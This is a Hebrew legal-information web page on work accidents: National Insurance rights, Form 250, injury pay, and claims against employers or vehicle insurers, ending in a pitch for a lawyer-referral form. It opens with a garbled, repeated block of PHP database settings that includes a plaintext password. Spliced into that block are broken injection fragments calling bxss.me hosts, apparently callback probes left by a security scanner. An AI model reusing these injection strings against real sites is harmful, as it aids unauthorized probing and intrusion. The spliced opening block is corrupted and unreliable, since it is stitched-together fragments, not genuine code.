$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_u $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> ?>; $db_name = "1"; ?>b_name = "1"; ?>esb9769.bxss.me.')[3].to_s)+'"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>; ?>'hiteptjlxcjea2c2f9.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>
תאונת עבודה היא למעשה פגיעה בעבודה. בתאונת עבודה העובד נפגע בזמן ועקב העבודה שלו. החוק הרלבנטי לעניין תאונות עבודה הוא חוק הביטוח הלאומי [נוסח משולב] התשנ"ה-1995.
חשוב להדגיש כי בחוק הורחבה ההגדרה של תאונת עבודה כך שגם תאונה בזמן הנסיעה לעבודה או מהעבודה יכולה בנסיבות מסוימות להיחשב לתאונת עבודה. על מנת לברר האם התאונה שקרתה לכם מהווה תאונת עבודה חשוב להתייעץ עם עורכי דין מקצועיים ובעלי ניסיון שמתמחים בתאונות עבודה.
הנפגע כתוצאה מתאונות עבודה נהנה מזכויות שונות בביטוח הלאומי ולכן על מנת לממש זכויות אלו יש לפנות למוסד לביטוח לאומי. מלבד זאת, הגורם שנגדו תוגש התביעה ישתנה לפי הנסיבות בהן התרחשה תאונת העבודה.
במקרה שמדובר בתאונת עבודה שנגרמה בשל רשלנות של המעביד בזמן עבודה, ניתן לתבוע את המעביד ואת חברת הביטוח שלו. לעומת זאת במידה שמדובר בתאונת דרכים תוגש התביעה נגד ביטוח החובה של כלי הרכב.
חשוב להדגיש לעניין זה, כי לא תוכלו לקבל פיצוי פעמיים. קרי כל סכום שתקבלו מהמוסד לביטוח לאומי יתקזז מול הסכום שייפסק לכם בתביעות האחרות.
באופן כללי יש לשמור את כל המסמכים והקבלות על ההוצאות הרפואיות שקשורים לתאונת העבודה. אלו מסייעים להוכיח שהנזק שנגרם נגרם כתוצאה מתאונת העבודה. את המסמכים כדאי להגיש למוסד לביטוח לאומי כמה שיותר מהר על מנת שהסכומים שמגיעים לכם ישולמו מוקדם ככל האפשר.
מלבד זאת יש ליידע את המעביד שלכם שנפגעתם כתוצאה מתאונת עבודה ולבקש ממנו טופס ביטוח לאומי 250. טופס זה הוא טופס לקבלת טיפול רפואי של מי שנפגע בתאונת עבודה.
חשוב להדגיש שכאשר אתם מגיעים לקבלת טיפול רפואי עקב תאונת העבודה יש להפנות את תשומת ליבו של מי שמטפל בעניינכם שנפגעתם כתוצאה מתאונת עבודה.
מי שנפגע בתאונת עבודה זכאי לקבל דמי פגיעה. גובה דמי הפגיעה נקבע לפי גובה השכר של מי שנפגע. הם מחושבים כממוצע של 3 חודשים לפני החודש שבו אירעה הפגיעה והם לא עולים מעל 75% מגובה השכר. דמי הפגיעה משולמים ל-91 יום מהיום שבו אירעה הפגיעה.
אם הנפגע עדיין לא מסוגל לעבוד לאחר חלוף התקופה של 91 יום (לפי אישור של רופא תעסוקתי) עליו לפנות לוועדה הרפואית של המוסד לביטוח לאומי כדי שתכריע בעניין של אחוזי נכות זמניים.
כפי שניתן לראות, תביעה בעניין תאונת עבודה היא הליך מורכב ולכן כדאי מאד להסתייע בשירותיהם של עורכי דין המתמחים בתחום זה. את הפניה בחינם לעורכי דין שמתמחים בתחום ניתן לבצע באמצעות מילוי הפרטים בטופס יצירת הקשר שמופיע באתר. עורכי הדין ישמחו לעזור לכם בשלבים השונים של ניהול ההליך.
לחץ כאן לקריאה מורחבת על קבלת פיצויים בעקבות תאונת עבודה